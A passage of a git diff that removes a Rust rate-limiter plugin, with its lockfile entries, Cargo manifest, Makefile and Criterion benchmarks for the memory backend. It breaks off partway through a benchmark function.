"67b1b7a3b5fe4f1376887184045fcf45c69e92af734b7aaddc05fb777b6fbd03" - -[[package]] -name = "socket2" -version = "0.5.10" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "e22376abed350d73dd1cd119b57ffccad95b4e585a7cda43e286245ce23c0678" -dependencies = [ - "libc", - "windows-sys 0.52.0", -] - -[[package]] -name = "socket2" -version = "0.6.3" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "3a766e1110788c36f4fa1c2b71b387a7815aa65f88ce0229841826633d93723e" -dependencies = [ - "libc", - "windows-sys 0.61.2", -] - -[[package]] -name = "stable_deref_trait" -version = "1.2.1" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "6ce2be8dc25455e1f91df71bfa12ad37d7af1092ae736f3a6cd0e37bc7810596" - -[[package]] -name = "static_assertions" -version = "1.1.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "a2eb9349b6444b326872e140eb1cf5e7c522154d69e7a0ffb0fb81c06b37543f" - -[[package]] -name = "syn" -version = "2.0.117" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "e665b8803e7b1d2a727f4023456bbbbe74da67099c585258af0ad9c5013b9b99" -dependencies = [ - "proc-macro2", - "quote", - "unicode-ident", -] - -[[package]] -name = "synstructure" -version = "0.13.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "728a70f3dbaf5bab7f0c4b1ac8d7ae5ea60a4b5549c8a5914361c99147a709d2" -dependencies = [ - "proc-macro2", - "quote", - "syn", -] - -[[package]] -name = "target-lexicon" -version = "0.13.5" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "adb6935a6f5c20170eeceb1a3835a49e12e19d792f6dd344ccc76a985ca5a6ca" - -[[package]] -name = "thiserror" -version = "2.0.18" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "4288b5bcbc7920c07a1149a35cf9590a2aa808e0bc1eafaade0b80947865fbc4" -dependencies = [ - "thiserror-impl", -] - -[[package]] -name = "thiserror-impl" -version = "2.0.18" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "ebc4ee7f67670e9b64d05fa4253e753e016c6c95ff35b89b7941d6b856dec1d5" -dependencies = [ - "proc-macro2", - "quote", - "syn", -] - -[[package]] -name = "time" -version = "0.3.47" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "743bd48c283afc0388f9b8827b976905fb217ad9e647fae3a379a9283c4def2c" -dependencies = [ - "deranged", - "num-conv", - "powerfmt", - "serde_core", - "time-core", -] - -[[package]] -name = "time-core" -version = "0.1.8" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "7694e1cfe791f8d31026952abf09c69ca6f6fa4e1a1229e18988f06a04a12dca" - -[[package]] -name = "tiny-keccak" -version = "2.0.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "2c9d3793400a45f954c52e73d068316d76b6f4e36977e3fcebb13a2721e80237" -dependencies = [ - "crunchy", -] - -[[package]] -name = "tinystr" -version = "0.8.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "42d3e9c45c09de15d06dd8acf5f4e0e399e85927b7f00711024eb7ae10fa4869" -dependencies = [ - "displaydoc", - "zerovec", -] - -[[package]] -name = "tinytemplate" -version = "1.2.1" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "be4d6b5f19ff7664e8c98d03e2139cb510db9b0a60b55f8e8709b689d939b6bc" -dependencies = [ - "serde", - "serde_json", -] - -[[package]] -name = "tokio" -version = "1.50.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "27ad5e34374e03cfffefc301becb44e9dc3c17584f414349ebe29ed26661822d" -dependencies = [ - "bytes", - "libc", - "mio", - "pin-project-lite", - "socket2 0.6.3", - "windows-sys 0.61.2", -] - -[[package]] -name = "tokio-util" -version = "0.7.18" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "9ae9cec805b01e8fc3fd2fe289f89149a9b66dd16786abd8b19cfa7b48cb0098" -dependencies = [ - "bytes", - "futures-core", - "futures-sink", - "pin-project-lite", - "tokio", -] - -[[package]] -name = "toml" -version = "1.0.7+spec-1.1.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "dd28d57d8a6f6e458bc0b8784f8fdcc4b99a437936056fa122cb234f18656a96" -dependencies = [ - "indexmap", - "serde_core", - "serde_spanned", - "toml_datetime", - "toml_parser", - "toml_writer", - "winnow", -] - -[[package]] -name = "toml_datetime" -version = "1.0.1+spec-1.1.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "9b320e741db58cac564e26c607d3cc1fdc4a88fd36c879568c07856ed83ff3e9" -dependencies = [ - "serde_core", -] - -[[package]] -name = "toml_parser" -version = "1.0.10+spec-1.1.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "7df25b4befd31c4816df190124375d5a20c6b6921e2cad937316de3fccd63420" -dependencies = [ - "winnow", -] - -[[package]] -name = "toml_writer" -version = "1.0.7+spec-1.1.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "f17aaa1c6e3dc22b1da4b6bba97d066e354c7945cac2f7852d4e4e7ca7a6b56d" - -[[package]] -name = "unic-char-property" -version = "0.9.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "a8c57a407d9b6fa02b4795eb81c5b6652060a15a7903ea981f3d723e6c0be221" -dependencies = [ - "unic-char-range", -] - -[[package]] -name = "unic-char-range" -version = "0.9.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "0398022d5f700414f6b899e10b8348231abf9173fa93144cbc1a43b9793c1fbc" - -[[package]] -name = "unic-common" -version = "0.9.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "80d7ff825a6a654ee85a63e80f92f054f904f21e7d12da4e22f9834a4aaa35bc" - -[[package]] -name = "unic-emoji-char" -version = "0.9.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "0b07221e68897210270a38bde4babb655869637af0f69407f96053a34f76494d" -dependencies = [ - "unic-char-property", - "unic-char-range", - "unic-ucd-version", -] - -[[package]] -name = "unic-ucd-ident" -version = "0.9.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "e230a37c0381caa9219d67cf063aa3a375ffed5bf541a452db16e744bdab6987" -dependencies = [ - "unic-char-property", - "unic-char-range", - "unic-ucd-version", -] - -[[package]] -name = "unic-ucd-version" -version = "0.9.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "96bd2f2237fe450fcd0a1d2f5f4e91711124f7857ba2e964247776ebeeb7b0c4" -dependencies = [ - "unic-common", -] - -[[package]] -name = "unicode-ident" -version = "1.0.24" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "e6e4313cd5fcd3dad5cafa179702e2b244f760991f45397d14d4ebf38247da75" - -[[package]] -name = "unicode-width" -version = "0.2.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "b4ac048d71ede7ee76d585517add45da530660ef4390e49b098733c6e897f254" - -[[package]] -name = "unicode_names2" -version = "1.3.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "d1673eca9782c84de5f81b82e4109dcfb3611c8ba0d52930ec4a9478f547b2dd" -dependencies = [ - "phf", - "unicode_names2_generator", -] - -[[package]] -name = "unicode_names2_generator" -version = "1.3.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "b91e5b84611016120197efd7dc93ef76774f4e084cd73c9fb3ea4a86c570c56e" -dependencies = [ - "getopts", - "log", - "phf_codegen", - "rand", -] - -[[package]] -name = "url" -version = "2.5.8" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "ff67a8a4397373c3ef660812acab3268222035010ab8680ec4215f38ba3d0eed" -dependencies = [ - "form_urlencoded", - "idna", - "percent-encoding", - "serde", -] - -[[package]] -name = "utf8_iter" -version = "1.0.4" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "b6c140620e7ffbb22c2dee59cafe6084a59b5ffc27a8859a5f0d494b5d52b6be" - -[[package]] -name = "walkdir" -version = "2.5.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "29790946404f91d9c5d06f9874efddea1dc06c5efe94541a7d6863108e3a5e4b" -dependencies = [ - "same-file", - "winapi-util", -] - -[[package]] -name = "wasi" -version = "0.11.1+wasi-snapshot-preview1" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "ccf3ec651a847eb01de73ccad15eb7d99f80485de043efb2f370cd654f4ea44b" - -[[package]] -name = "wasm-bindgen" -version = "0.2.114" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "6532f9a5c1ece3798cb1c2cfdba640b9b3ba884f5db45973a6f442510a87d38e" -dependencies = [ - "cfg-if", - "once_cell", - "rustversion", - "wasm-bindgen-macro", - "wasm-bindgen-shared", -] - -[[package]] -name = "wasm-bindgen-macro" -version = "0.2.114" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "18a2d50fcf105fb33bb15f00e7a77b772945a2ee45dcf454961fd843e74c18e6" -dependencies = [ - "quote", - "wasm-bindgen-macro-support", -] - -[[package]] -name = "wasm-bindgen-macro-support" -version = "0.2.114" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "03ce4caeaac547cdf713d280eda22a730824dd11e6b8c3ca9e42247b25c631e3" -dependencies = [ - "bumpalo", - "proc-macro2", - "quote", - "syn", - "wasm-bindgen-shared", -] - -[[package]] -name = "wasm-bindgen-shared" -version = "0.2.114" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "75a326b8c223ee17883a4251907455a2431acc2791c98c26279376490c378c16" -dependencies = [ - "unicode-ident", -] - -[[package]] -name = "web-sys" -version = "0.3.91" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "854ba17bb104abfb26ba36da9729addc7ce7f06f5c0f90f3c391f8461cca21f9" -dependencies = [ - "js-sys", - "wasm-bindgen", -] - -[[package]] -name = "winapi" -version = "0.3.9" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "5c839a674fcd7a98952e593242ea400abe93992746761e38641405d28b00f419" -dependencies = [ - "winapi-i686-pc-windows-gnu", - "winapi-x86_64-pc-windows-gnu", -] - -[[package]] -name = "winapi-i686-pc-windows-gnu" -version = "0.4.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "ac3b87c63620426dd9b991e5ce0329eff545bccbbb34f3be09ff6fb6ab51b7b6" - -[[package]] -name = "winapi-util" -version = "0.1.11" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "c2a7b1c03c876122aa43f3020e6c3c3ee5c05081c9a00739faf7503aeba10d22" -dependencies = [ - "windows-sys 0.61.2", -] - -[[package]] -name = "winapi-x86_64-pc-windows-gnu" -version = "0.4.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "712e227841d057c1ee1cd2fb22fa7e5a5461ae8e48fa2ca79ec42cfc1931183f" - -[[package]] -name = "windows-core" -version = "0.62.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "b8e83a14d34d0623b51dce9581199302a221863196a1dde71a7663a4c2be9deb" -dependencies = [ - "windows-implement", - "windows-interface", - "windows-link", - "windows-result", - "windows-strings", -] - -[[package]] -name = "windows-implement" -version = "0.60.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "053e2e040ab57b9dc951b72c264860db7eb3b0200ba345b4e4c3b14f67855ddf" -dependencies = [ - "proc-macro2", - "quote", - "syn", -] - -[[package]] -name = "windows-interface" -version = "0.59.3" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "3f316c4a2570ba26bbec722032c4099d8c8bc095efccdc15688708623367e358" -dependencies = [ - "proc-macro2", - "quote", - "syn", -] - -[[package]] -name = "windows-link" -version = "0.2.1" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "f0805222e57f7521d6a62e36fa9163bc891acd422f971defe97d64e70d0a4fe5" - -[[package]] -name = "windows-result" -version = "0.4.1" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "7781fa89eaf60850ac3d2da7af8e5242a5ea78d1a11c49bf2910bb5a73853eb5" -dependencies = [ - "windows-link", -] - -[[package]] -name = "windows-strings" -version = "0.5.1" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "7837d08f69c77cf6b07689544538e017c1bfcf57e34b4c0ff58e6c2cd3b37091" -dependencies = [ - "windows-link", -] - -[[package]] -name = "windows-sys" -version = "0.52.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "282be5f36a8ce781fad8c8ae18fa3f9beff57ec1b52cb3de0789201425d9a33d" -dependencies = [ - "windows-targets", -] - -[[package]] -name = "windows-sys" -version = "0.61.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "ae137229bcbd6cdf0f7b80a31df61766145077ddf49416a728b02cb3921ff3fc" -dependencies = [ - "windows-link", -] - -[[package]] -name = "windows-targets" -version = "0.52.6" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "9b724f72796e036ab90c1021d4780d4d3d648aca59e491e6b98e725b84e99973" -dependencies = [ - "windows_aarch64_gnullvm", - "windows_aarch64_msvc", - "windows_i686_gnu", - "windows_i686_gnullvm", - "windows_i686_msvc", - "windows_x86_64_gnu", - "windows_x86_64_gnullvm", - "windows_x86_64_msvc", -] - -[[package]] -name = "windows_aarch64_gnullvm" -version = "0.52.6" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "32a4622180e7a0ec044bb555404c800bc9fd9ec262ec147edd5989ccd0c02cd3" - -[[package]] -name = "windows_aarch64_msvc" -version = "0.52.6" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "09ec2a7bb152e2252b53fa7803150007879548bc709c039df7627cabbd05d469" - -[[package]] -name = "windows_i686_gnu" -version = "0.52.6" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "8e9b5ad5ab802e97eb8e295ac6720e509ee4c243f69d781394014ebfe8bbfa0b" - -[[package]] -name = "windows_i686_gnullvm" -version = "0.52.6" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "0eee52d38c090b3caa76c563b86c3a4bd71ef1a819287c19d586d7334ae8ed66" - -[[package]] -name = "windows_i686_msvc" -version = "0.52.6" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "240948bc05c5e7c6dabba28bf89d89ffce3e303022809e73deaefe4f6ec56c66" - -[[package]] -name = "windows_x86_64_gnu" -version = "0.52.6" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "147a5c80aabfbf0c7d901cb5895d1de30ef2907eb21fbbab29ca94c5b08b1a78" - -[[package]] -name = "windows_x86_64_gnullvm" -version = "0.52.6" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "24d5b23dc417412679681396f2b49f3de8c1473deb516bd34410872eff51ed0d" - -[[package]] -name = "windows_x86_64_msvc" -version = "0.52.6" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "589f6da84c646204747d1270a2a5661ea66ed1cced2631d546fdfb155959f9ec" - -[[package]] -name = "winnow" -version = "1.0.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "a90e88e4667264a994d34e6d1ab2d26d398dcdca8b7f52bec8668957517fc7d8" - -[[package]] -name = "writeable" -version = "0.6.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "9edde0db4769d2dc68579893f2306b26c6ecfbe0ef499b013d731b7b9247e0b9" - -[[package]] -name = "yoke" -version = "0.8.1" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "72d6e5c6afb84d73944e5cedb052c4680d5657337201555f9f2a16b7406d4954" -dependencies = [ - "stable_deref_trait", - "yoke-derive", - "zerofrom", -] - -[[package]] -name = "yoke-derive" -version = "0.8.1" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "b659052874eb698efe5b9e8cf382204678a0086ebf46982b79d6ca3182927e5d" -dependencies = [ - "proc-macro2", - "quote", - "syn", - "synstructure", -] - -[[package]] -name = "zerocopy" -version = "0.8.47" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "efbb2a062be311f2ba113ce66f697a4dc589f85e78a4aea276200804cea0ed87" -dependencies = [ - "zerocopy-derive", -] - -[[package]] -name = "zerocopy-derive" -version = "0.8.47" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "0e8bc7269b54418e7aeeef514aa68f8690b8c0489a06b0136e5f57c4c5ccab89" -dependencies = [ - "proc-macro2", - "quote", - "syn", -] - -[[package]] -name = "zerofrom" -version = "0.1.6" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "50cc42e0333e05660c3587f3bf9d0478688e15d870fab3346451ce7f8c9fbea5" -dependencies = [ - "zerofrom-derive", -] - -[[package]] -name = "zerofrom-derive" -version = "0.1.6" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "d71e5d6e06ab090c67b5e44993ec16b72dcbaabc526db883a360057678b48502" -dependencies = [ - "proc-macro2", - "quote", - "syn", - "synstructure", -] - -[[package]] -name = "zerotrie" -version = "0.2.3" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "2a59c17a5562d507e4b54960e8569ebee33bee890c70aa3fe7b97e85a9fd7851" -dependencies = [ - "displaydoc", - "yoke", - "zerofrom", -] - -[[package]] -name = "zerovec" -version = "0.11.5" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "6c28719294829477f525be0186d13efa9a3c602f7ec202ca9e353d310fb9a002" -dependencies = [ - "yoke", - "zerofrom", - "zerovec-derive", -] - -[[package]] -name = "zerovec-derive" -version = "0.11.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "eadce39539ca5cb3985590102671f2567e659fca9666581ad3411d59207951f3" -dependencies = [ - "proc-macro2", - "quote", - "syn", -] - -[[package]] -name = "zmij" -version = "1.0.21" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "b8848ee67ecc8aedbaf3e4122217aff892639231befc6a1b58d29fff4c2cabaa" diff --git a/plugins_rust/rate_limiter/Cargo.toml b/plugins_rust/rate_limiter/Cargo.toml deleted file mode 100644 index 960754b9c9..0000000000 --- a/plugins_rust/rate_limiter/Cargo.toml +++ /dev/null @@ -1,44 +0,0 @@ -[package] -name = "rate_limiter" -version = "0.1.0" -edition = "2024" -authors = ["ContextForge Contributors"] -license = "Apache-2.0" -repository = "https://github.com/IBM/mcp-context-forge" -description = "High-performance rate limiter engine for MCP Gateway" - -[lib] -name = "rate_limiter_rust" -crate-type = ["cdylib", "rlib"] - -[[bin]] -name = "stub_gen" -path = "src/bin/stub_gen.rs" - -[dependencies] -pyo3 = { version = "0.28.2", features = ["abi3-py311"] } -pyo3-async-runtimes = { version = "0.28", features = ["tokio-runtime"] } -pyo3-stub-gen = "0.19" -pyo3-log = "0.13" -log = "0.4" -parking_lot = "0.12" -thiserror = "2.0" -redis = { version = "0.27", features = ["aio", "tokio-comp"] } -tokio = { version = "1", features = ["rt-multi-thread", "sync", "time"] } - -[dev-dependencies] -criterion = { version = "0.8", features = ["html_reports"] } - -[[bench]] -name = "rate_limiter" -harness = false - -[profile.release] -opt-level = 3 -lto = "fat" -codegen-units = 1 -strip = true - -[profile.bench] -inherits = "release" -debug = true diff --git a/plugins_rust/rate_limiter/Makefile b/plugins_rust/rate_limiter/Makefile deleted file mode 100644 index 6af7c6d39b..0000000000 --- a/plugins_rust/rate_limiter/Makefile +++ /dev/null @@ -1,161 +0,0 @@ -# ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ -# Rate Limiter Engine - Makefile -# High-performance rate limiter engine (Rust + PyO3) -# ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ -# -# help: Rate Limiter Engine (Rust + Python extension build & automation) -# ───────────────────────────────────────────────────────────────────────── - -.PHONY: help -help: - @grep '^# help\:' $(firstword $(MAKEFILE_LIST)) | sed 's/^# help\: //' - -PACKAGE_NAME := rate_limiter -PROJECT_PYTHON := $(abspath ../../.venv/bin/python) - -GREEN := \033[0;32m -YELLOW := \033[0;33m -NC := \033[0m - -# ============================================================================= -# 🔍 LINTING & FORMAT -# ============================================================================= -# help: fmt - Format Rust code with rustfmt -# help: fmt-check - Check Rust code formatting (CI) -# help: clippy - Run clippy lints -.PHONY: fmt fmt-check clippy - -fmt: - cargo fmt - -fmt-check: - cargo fmt -- --check - -clippy: - cargo clippy -- -D warnings - -# ============================================================================= -# 🧪 TESTS -# ============================================================================= -# help: test - Run Rust unit tests -# help: test-verbose - Run Rust tests with verbose output -# help: test-python - Run Python wrapper tests -# help: test-all - Run both Rust and Python tests -.PHONY: test test-verbose test-python test-all test-integration - -test: - @echo "$(GREEN)Running rate_limiter Rust tests...$(NC)" - cargo test - -test-verbose: - @echo "$(GREEN)Running rate_limiter Rust tests (verbose)...$(NC)" - cargo test -- --nocapture - -test-python: - @echo "$(GREEN)Running Python wrapper tests...$(NC)" - cd ../.. && uv run pytest -k rate_limiter -v - -test-integration: - @echo "$(GREEN)Running integration tests (requires Redis)...$(NC)" - cd ../.. && uv run pytest tests/integration/test_rate_limiter.py -v - -test-all: test test-python - -# ============================================================================= -# 🛠 BUILD -# ============================================================================= -# help: stub-gen - Generate Python type stubs (.pyi files) -# help: build - Build release extension (no install) -# help: install - Build and install wheel into project venv -.PHONY: stub-gen build install uninstall - -stub-gen: - @echo "$(GREEN)Generating Python type stubs...$(NC)" - @PYO3_PYTHON="$(PROJECT_PYTHON)" cargo run --bin stub_gen - @echo "$(GREEN)Stubs generated$(NC)" - -build: stub-gen - @echo "$(GREEN)Building $(PACKAGE_NAME)...$(NC)" - @cd ../.. && uv run maturin build --release --manifest-path plugins_rust/rate_limiter/Cargo.toml - @echo "$(GREEN)Build complete$(NC)" - -install: stub-gen - @echo "$(GREEN)Installing $(PACKAGE_NAME)...$(NC)" - @cd ../.. && uv run maturin develop --release --manifest-path plugins_rust/rate_limiter/Cargo.toml - @echo "$(GREEN)Installation complete$(NC)" - -uninstall: - @echo "$(YELLOW)Uninstalling $(PACKAGE_NAME)...$(NC)" - @cd ../.. && uv pip uninstall -y mcpgateway-rate-limiter 2>/dev/null || true - -# ============================================================================= -# 📊 BENCHMARKS -# ============================================================================= -# help: bench - Run Criterion benchmarks -# help: bench-compare - Compare against saved baseline -# help: compare - Run Python vs Rust hook-path comparison -# help: compare-quick - Run a quick Python vs Rust comparison -# help: compare-detailed - Run a detailed Python vs Rust comparison -.PHONY: bench bench-baseline bench-compare compare compare-quick compare-detailed - -bench: - @echo "$(GREEN)Running benchmarks...$(NC)" - cargo bench - -bench-baseline: - cargo bench --bench rate_limiter -- --save-baseline main - -bench-compare: - cargo bench --bench rate_limiter -- --baseline main - -compare: install - @echo "$(GREEN)Running Python vs Rust hook-path comparison...$(NC)" - @cd ../.. && uv run python3 plugins_rust/rate_limiter/compare_performance.py - -compare-quick: install - @echo "$(GREEN)Running quick Python vs Rust hook-path comparison...$(NC)" - @cd ../.. && uv run python3 plugins_rust/rate_limiter/compare_performance.py --iterations 250 --warmup 25 - -compare-detailed: install - @echo "$(GREEN)Running detailed Python vs Rust hook-path comparison...$(NC)" - @cd ../.. && uv run python3 plugins_rust/rate_limiter/compare_performance.py --iterations 5000 --warmup 500 - -# ============================================================================= -# 🧹 CLEANUP -# ============================================================================= -.PHONY: clean clean-all - -clean: - cargo clean - rm -rf target/ coverage/ - find . -name "*.whl" -delete - -clean-all: clean - -# ============================================================================= -# 📚 DOCUMENTATION -# ============================================================================= -.PHONY: doc doc-open - -doc: - cargo doc --no-deps --document-private-items - -doc-open: doc - cargo doc --no-deps --document-private-items --open - -# ============================================================================= -# 🔧 DEVELOPMENT HELPERS -# ============================================================================= -# help: verify - Verify plugin installation -# help: check-all - Run fmt-check + clippy + test -.PHONY: verify check-all pre-commit - -verify: - @cd ../.. && uv run python -c "import rate_limiter_rust; print('✅ rate_limiter_rust available')" || echo "⚠️ rate_limiter_rust not installed — run: make install" - -check-all: fmt-check clippy test - @echo "$(GREEN)✔ All checks passed$(NC)" - -pre-commit: check-all - -.DEFAULT_GOAL := help diff --git a/plugins_rust/rate_limiter/benches/rate_limiter.rs b/plugins_rust/rate_limiter/benches/rate_limiter.rs deleted file mode 100644 index 6d60a87ffe..0000000000 --- a/plugins_rust/rate_limiter/benches/rate_limiter.rs +++ /dev/null @@ -1,244 +0,0 @@ -// Copyright 2026 -// SPDX-License-Identifier: Apache-2.0 -// -// Criterion benchmarks for the rate limiter memory backend. -// PERF-01, MEM-02, MEM-03, MEM-04. -// -// These benchmarks test the raw MemoryStore performance (no PyO3 overhead) -// across various access patterns: single-key, multi-dim, hot-counter, -// blocked-path, many-keys, and multi-threaded contention. - -use std::hint::black_box; -use std::sync::Arc; - -use criterion::{Criterion, criterion_group, criterion_main}; -use rate_limiter_rust::{clock::FakeClock, config::Algorithm, memory::MemoryStore}; - -const T0_UNIX: i64 = 1_000_000; -const LIMIT: u64 = 100; -const WINDOW: u64 = 60_000_000_000; // 60s in nanos - -fn make_store_and_clock() -> (Arc, rate_limiter_rust::clock::FakeClockHandle) { - let (clock, handle) = FakeClock::new(T0_UNIX); - let _ = clock; // clock is only needed for engine; store uses explicit timestamps - (Arc::new(MemoryStore::new()), handle) -} - -// --------------------------------------------------------------------------- -// Original single-key benchmarks (direct MemoryStore, no Python required) -// --------------------------------------------------------------------------- - -fn bench_fixed_window(c: &mut Criterion) { - let (store, handle) = make_store_and_clock(); - c.bench_function("fixed_window/single_key", |b| { - b.iter(|| { - handle.advance_secs(61); - store.check_and_increment( - black_box("user:bench"), - LIMIT, - WINDOW, - Algorithm::FixedWindow, - handle.monotonic_nanos(), - handle.unix_secs(), - ) - }) - }); -} - -fn bench_token_bucket(c: &mut Criterion) { - let (store, handle) = make_store_and_clock(); - c.bench_function("token_bucket/single_key", |b| { - b.iter(|| { - handle.advance_secs(61); - store.check_and_increment( - black_box("user:bench"), - LIMIT, - WINDOW, - Algorithm::TokenBucket, - handle.monotonic_nanos(), - handle.unix_secs(), - ) - }) - }); -} - -fn bench_sliding_window(c: &mut Criterion) { - let (store, handle) = make_store_and_clock(); - c.bench_function("sliding_window/single_key", |b| { - b.iter(|| { - handle.advance_secs(61); - store.check_and_increment( - black_box("user:bench"), - LIMIT, - WINDOW, - Algorithm::SlidingWindow, - handle.monotonic_nanos(), - handle.unix_secs(), - ) - }) - }); -} - -fn bench_multi_dim(c: &mut Criterion) { - let (store, handle) = make_store_and_clock(); - c.bench_function("fixed_window/three_dims", |b| { - b.iter(|| { - handle.advance_secs(61); - let now_mono = handle.monotonic_nanos(); - let now_unix = handle.unix_secs(); - let _r1 = store.check_and_increment( - "user:alice", - LIMIT, - WINDOW, - Algorithm::FixedWindow, - now_mono, - now_unix, - ); - let _r2 = store.check_and_increment( - "tenant:acme", - LIMIT * 100, - WINDOW, - Algorithm::FixedWindow, - now_mono, - now_unix, - ); - let _r3 = store.check_and_increment( - "tool:search", - LIMIT / 10, - WINDOW, - Algorithm::FixedWindow, - now_mono, - now_unix, - ); - }) - }); -} - -// --------------------------------------------------------------------------- -// Hot-counter: counter at near-limit, no window reset between iterations -// --------------------------------------------------------------------------- - -fn bench_fixed_window_hot_counter(c: &mut Criterion) { - let (store, handle) = make_store_and_clock(); - let mut iteration = 0u64; - c.bench_function("fixed_window/hot_counter", |b| { - b.iter(|| { - iteration += 1; - // Reset the window every LIMIT iterations to prevent permanent blocking - if iteration.is_multiple_of(LIMIT) { - handle.advance_secs(61); - } - store.check_and_increment( - black_box("user:hot"), - LIMIT, - WINDOW, - Algorithm::FixedWindow, - handle.monotonic_nanos(), - handle.unix_secs(), - ) - }) - }); -} - -// --------------------------------------------------------------------------- -// Blocked-path: counter past limit, measures reject code path -// --------------------------------------------------------------------------- - -fn bench_fixed_window_blocked(c: &mut Criterion) { - let (store, handle) = make_store_and_clock(); - // Exhaust the limit once - let now_mono = handle.monotonic_nanos(); - let now_unix = handle.unix_secs(); - for _ in 0..LIMIT { - store.check_and_increment( - "user:blocked", - LIMIT, - WINDOW, - Algorithm::FixedWindow, - now_mono, - now_unix, - ); - } - // Now every call hits the blocked path - c.bench_function("fixed_window/blocked_path", |b| { - b.iter(|| { - store.check_and_increment( - black_box("user:blocked"), - LIMIT, - WINDOW, - Algorithm::FixedWindow, - handle.monotonic_nanos(), - handle.unix_secs(), - ) - }) - }); -} - -// --------------------------------------------------------------------------- -// Many-keys: tests HashMap scaling and cache behavior -// --------------------------------------------------------------------------- - -fn bench_fixed_window_many_keys(c: &mut Criterion) { - let (store, handle) = make_store_and_clock(); - let keys: Vec = (0..10_000).map(|i| format!("user:many{}", i)).collect(); - let mut key_idx = 0usize; - c.bench_function("fixed_window/many_keys_10k", |b| { - b.iter(|| { - key_idx = (key_idx + 1) % keys.len(); - store.check_and_increment( - black_box(&keys[key_idx]), - LIMIT, - WINDOW, - Algorithm::FixedWindow, - handle.monotonic_nanos(), - handle.unix_secs(), - ) - }) - }); -} - -// --------------------------------------------------------------------------- -// Multi-threaded: concurrent access from N threads (parking_lot contention) -// --------------------------------------------------------------------------- - -fn bench_fixed_window_concurrent(c: &mut Criterion) { - let (store, handle) = make_store_and_clock(); - - for threads in [2, 4, 8] { - c.bench_function(&format!("fixed_window/concurrent_{}t", threads), |b| { - b.iter(|| { - handle.advance_secs(61); - let now_mono = handle.monotonic_nanos(); - let now_unix = handle.unix_secs(); - std::thread::scope(|s| { - for t in 0..threads { - let store = &store; - s.spawn(move || { - store.check_and_increment( - &format!("user:thread{}", t), - LIMIT, - WINDOW, - Algorithm::FixedWindow, - now_mono, - now_unix, 